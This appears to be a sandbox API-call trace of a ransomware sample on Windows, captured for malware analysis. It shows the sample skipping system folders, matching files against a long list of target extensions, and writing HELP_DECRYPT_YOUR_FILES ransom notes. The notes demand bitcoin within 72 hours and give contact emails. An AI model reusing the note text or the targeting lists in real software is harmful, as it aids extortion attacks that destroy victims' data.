	[0168.787] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.788] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="cookies") returned 0x0
	[0168.788] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.788] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="programdata") returned 0x0
	[0168.788] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc088dfed, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0168.788] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2000, ftCreationTime.dwLowDateTime=0xc088dfed, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa37065bb, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutoLogger-Diagtrack-Listener.etl", cAlternateFileName="AUTOLO~1.ETL")) returned 1
	[0168.788] lstrcmpW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2="..") returned 1
	[0168.788] lstrcmpW (lpString1="AutoLogger-Diagtrack-Listener.etl", lpString2=".") returned 1
	[0168.788] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\"
	[0168.789] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\", lpString2="AutoLogger-Diagtrack-Listener.etl" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\AutoLogger-Diagtrack-Listener.etl") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\AutoLogger-Diagtrack-Listener.etl"
	[0168.789] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\AutoLogger-Diagtrack-Listener.etl") returned 91
	[0168.789] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.789] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\AutoLogger-Diagtrack-Listener.etl", cchLength=0x5b | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\autologger-diagtrack-listener.etl") returned 0x5b
	[0168.789] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\autologger-diagtrack-listener.etl" | out: lpString1="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\autologger-diagtrack-listener.etl") returned="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\autologger-diagtrack-listener.etl"
	[0168.789] lstrlenW (lpString="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\autologger-diagtrack-listener.etl") returned 91
	[0168.789] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.790] StrStrW (lpFirst=".etl", lpSrch=".") returned=".etl"
	[0168.790] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.790] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".etl") returned 0x0
	[0168.791] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x2000, ftCreationTime.dwLowDateTime=0xc088dfed, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xa37065bb, ftLastWriteTime.dwHighDateTime=0x1d976a2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AutoLogger-Diagtrack-Listener.etl", cAlternateFileName="AUTOLO~1.ETL")) returned 0
	[0168.791] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0168.791] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0168.792] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger"
	[0168.792] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*.*"
	[0168.792] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.792] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.792] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\HELP_DECRYPT_YOUR_FILES.TXT") returned 85
	[0168.792] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0168.793] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0168.793] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0168.796] CloseHandle (hObject=0x390) returned 1
	[0168.797] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.797] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.797] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0168.799] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0168.799] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0168.799] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0168.799] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0168.799] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0168.800] CloseHandle (hObject=0x390) returned 1
	[0168.800] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0168.800] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0168.801] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0168.801] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\HELP_DECRYPT_YOUR_FILES.HTML") returned 86
	[0168.801] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0168.805] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0168.805] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0168.809] CloseHandle (hObject=0x390) returned 1
	[0168.809] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0168.809] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0168.810] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0168.810] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0168.811] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.811] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0168.811] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0168.812] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0168.812] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0168.812] CloseHandle (hObject=0x390) returned 1
	[0168.812] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc088dfed, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x7e24396d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0168.813] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*.*") returned 61
	[0168.813] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0168.813] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\ETLLogs\\AutoLogger\\*.*", cchLength=0x3d | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*") returned 0x3d
	[0168.813] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.813] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="windows") returned 0x0
	[0168.813] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.814] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="boot") returned 0x0
	[0168.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.814] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="system volume information") returned 0x0
	[0168.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.814] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0168.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.814] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="temp") returned 0x0
	[0168.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.815] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="program files") returned 0x0
	[0168.815] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.815] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="program files (x86)") returned 0x0
	[0168.815] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.815] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="appdata") returned 0x0
	[0168.815] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.816] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="application data") returned 0x0
	[0168.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.816] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="winnt") returned 0x0
	[0168.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.816] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="tmp") returned 0x0
	[0168.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.816] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="cache") returned 0x0
	[0168.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.817] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="temporary internet files") returned 0x0
	[0168.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.817] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="webcache") returned 0x0
	[0168.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.817] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="inetcache") returned 0x0
	[0168.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.818] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="nvidia") returned 0x0
	[0168.818] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0168.818] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\etllogs\\autologger\\*.*", lpSrch="packages") returned 0x0
	[0168.818] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
